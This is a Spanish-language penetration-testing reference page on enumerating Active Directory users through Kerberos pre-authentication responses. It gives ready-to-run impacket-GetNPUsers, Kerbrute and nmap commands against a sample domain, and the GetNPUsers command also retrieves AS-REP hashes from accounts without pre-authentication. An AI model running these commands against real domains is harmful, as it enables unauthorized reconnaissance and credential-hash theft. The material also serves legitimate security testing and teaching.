search
InicioServicios de CiberseguridadDocumentación técnicaContacto

Enumeración de usuarios Kerberos

hashtag
Descripción

La enumeración de usuarios en Kerberos consiste en hacer fuerza bruta al Active Directory mediante un diccionario de usuarios.

Para enumerar los usuario de Kerberos se envía una solicitud TGT sin pre-autenticación Si el KDC responde con el error KDC_ERR_C_PRINCIPAL_UNKNOWN, el nombre de usuario no existe. Sin embargo, si el KDC solicita pre-autenticación, sabemos que el nombre de usuario existe.

Esto no causa ningún error de inicio de sesión, por lo que no bloqueará la cuenta.

Para llevar a cabo la enumeración de usuarios en Kerberos se pueden utilizar las siguientes herramientas:

  • Impacket-GetNPUsers

  • Kerbrute

  • Nmap

La lista de usuarios para la enumeración tiene que tener el siguiente formato:

users.txt 
iwolf
papa
administrator
danj
adamb
alans
chrisn
...

hashtag
Impacket-GetNPUsers

impacket-GetNPUsers atlanta.corp/ -usersfile /home/iwolf/Desktop/users.txt -dc-ip 10.0.0.128 -request

circle-info

En este caso se ha indicado el falg -request para que, si encuentra una cuenta que no requiere pre-autenticación automaticamente muestre el HASH del usuario.

hashtag
Kerbrute

./kerbrute userenum --dc 10.0.0.128 -d atlanta.corp /home/iwolf/Desktop/users.txt

hashtag
Nmap

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='atlanta.corp',userdb=/home/iwolf/Desktop/users.txt 10.0.0.128 -Pn

hashtag
Referencias

LogoGitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHubchevron-right
LogoGitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHubchevron-right
PreviousEnumeraciónNextKerberos

Last updated